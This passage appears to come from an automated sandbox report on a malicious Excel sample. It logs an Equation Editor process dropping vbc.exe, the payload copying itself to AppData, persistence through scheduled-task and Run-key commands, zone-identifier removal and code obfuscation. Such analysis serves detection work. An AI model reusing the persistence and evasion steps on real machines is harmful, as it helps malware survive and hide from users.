Source: C:\Windows\SysWOW64\schtasks.exe Console Write: ....................d...........E.R.R.O.(.P.............................$...............................................j.......................
Source: C:\Windows\SysWOW64\schtasks.exe Console Write: ....................H.!.........E.R.R.O.R.:. .............................................................................................!.....
Source: C:\Windows\SysWOW64\schtasks.exe Console Write: ....................H.!.........E.R.R.O.(.P.............................................................................j.................!.....
Source: C:\Users\Public\vbc.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\Public\vbc.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Users\Public\vbc.exe WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Source: C:\Users\Public\vbc.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\Public\vbc.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\Public\vbc.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\Public\vbc.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\Public\vbc.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\Public\vbc.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\Public\vbc.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\Public\vbc.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\Public\vbc.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\Public\vbc.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\Public\vbc.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\Public\vbc.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\Public\vbc.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\Public\vbc.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\Public\vbc.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\Public\vbc.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\Public\vbc.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: Doc2.xlsx ReversingLabs: Detection: 28%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\WzyRXCWtdGSdEA' /XML 'C:\Users\user\AppData\Local\Temp\tmpB2BC.tmp'
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe {path}
Source: unknown Process created: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe 'C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe'
Source: unknown Process created: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe 'C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe'
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\WzyRXCWtdGSdEA' /XML 'C:\Users\user\AppData\Local\Temp\tmp74F2.tmp'
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\WzyRXCWtdGSdEA' /XML 'C:\Users\user\AppData\Local\Temp\tmp7511.tmp'
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Process created: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe {path}
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Process created: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe {path}
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\WzyRXCWtdGSdEA' /XML 'C:\Users\user\AppData\Local\Temp\tmpB2BC.tmp' Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe {path} Jump to behavior
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\WzyRXCWtdGSdEA' /XML 'C:\Users\user\AppData\Local\Temp\tmp7511.tmp' Jump to behavior
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Process created: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe {path} Jump to behavior
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\WzyRXCWtdGSdEA' /XML 'C:\Users\user\AppData\Local\Temp\tmp74F2.tmp' Jump to behavior
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Process created: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe {path} Jump to behavior
Source: C:\Users\Public\vbc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\Public\vbc.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: Doc2.xlsx Static file information: File size 1239552 > 1048576
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: .pDBl source: vbc.exe, 00000006.00000002.2229803981.0000000002311000.00000004.00000001.sdmp, vbc.exe, 00000009.00000002.2370417505.0000000002251000.00000004.00000001.sdmp, MLdAu.exe, 0000000B.00000002.2335458220.0000000001FF1000.00000004.00000001.sdmp
Source: Doc2.xlsx Initial sample: OLE indicators vbamacros = False
Source: Doc2.xlsx Initial sample: OLE indicators encrypted = True

Data Obfuscation:

barindex
.NET source code contains potential unpacker
Source: vbc.exe.4.dr, Utilities/YatcForm.cs .Net Code: EFEFEFEFEFEF System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\Public\vbc.exe Code function: 6_2_10727F11 push es; iretd 6_2_1072815A
Source: C:\Users\Public\vbc.exe Code function: 6_2_00319718 push esp; retf 6_2_00319719
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Code function: 11_2_10FC7F11 push es; iretd 11_2_10FC815A
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Code function: 11_2_002E7198 push eax; retn 0018h 11_2_002E71E5
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Code function: 11_2_002E9718 push esp; retf 11_2_002E9719
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Code function: 11_2_002E8B80 pushad ; ret 11_2_002E8C19
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Code function: 12_2_00279718 push esp; retf 12_2_00279719
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Code function: 17_2_10FC7F11 push es; iretd 17_2_10FC815A
Source: initial sample Static PE information: section name: .text entropy: 7.51973544971
Source: initial sample Static PE information: section name: .text entropy: 7.51973544971

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Users\Public\vbc.exe File created: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe File created: C:\Users\user\AppData\Roaming\WzyRXCWtdGSdEA.exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Doc_87654334567[1].exe Jump to dropped file
Drops PE files to the user directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file

Boot Survival:

barindex
Drops PE files to the user root directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Users\Public\vbc.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\WzyRXCWtdGSdEA' /XML 'C:\Users\user\AppData\Local\Temp\tmpB2BC.tmp'
Source: C:\Users\Public\vbc.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run MLdAu Jump to behavior
Source: C:\Users\Public\vbc.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run MLdAu Jump to behavior

Hooking and other Techniques for Hiding and Protection:

barindex
Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Users\Public\vbc.exe File opened: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe:Zone.Identifier read attributes | delete Jump to behavior
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Users\Public\vbc.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Process information set: NOOPENFILEERRORBOX
